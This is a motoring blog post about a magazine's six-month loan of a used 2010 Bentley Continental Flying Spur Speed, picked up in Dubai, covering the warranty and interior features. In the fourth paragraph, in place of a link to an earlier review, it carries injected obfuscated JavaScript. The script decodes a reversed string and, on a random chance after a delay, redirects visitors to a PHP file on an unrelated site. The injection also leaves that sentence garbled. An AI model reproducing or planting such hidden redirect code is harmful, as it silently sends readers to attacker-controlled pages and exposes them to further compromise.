As blags go, this is a pretty  good one. Frankly, I’m expecting someone to tap me on the shoulder at any moment and explain that the game’s up. But for now, I’ve got a Bentley.

We’ve managed to wangle this 2010 Continental Flying Spur Speed for six months, which is excellent news for the whole crankandpiston office. The downside is that we’ll all have to be on our guard for the next half year, as everyone is plotting intricate, sneaky ways of pinching the keys from each other.

But anyway. We’ve procured this new addition to The Management Fleet in part to feel like Sirs for a bit, but also because Bentley is keen to stress that buying a pre-owned car is a viable option if you want to save a bit of money. Ours has done just over 11,000km, but is as new inside, having gone through many rigorous tests and checks to ensure there’s nothing wrong with it – a status we hope will be confirmed over the next six months. Just in case, it’s got a 12-month unlimited mileage warranty as an approved used Bentley.

I picked up The Speed (as I’ve been calling it) from Bentley‘s brand new servicing facility on the outskirts of Dubai. It’s shared with Bugatti and McLaren and is the largest Bentley service facility anywhere in the world, capable of holding 40 Bentleys at any one time as well as a plethora of spares in its 189,000 square metres. Among the cars present during our visit was the one you see pictured here. The one in Local Favourite White, with a red leather and maple interior. Ours.

Although based on the previous generation Continental rather than $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/bentley-continental-gt-v8-testing-the-waters/” target=”_blank”>the new one we tried a few months ago, the Flying Spur still has plenty of funky features to offer driver and passengers, from cruise control and Bluetooth to massage seats, four-zone air conditioning and an iPod connector for the high-end stereo system. The workmanship is outstanding, with hand-stitched upholstery and immaculately hand-carved wooden sections and painstakingly applied veneers.
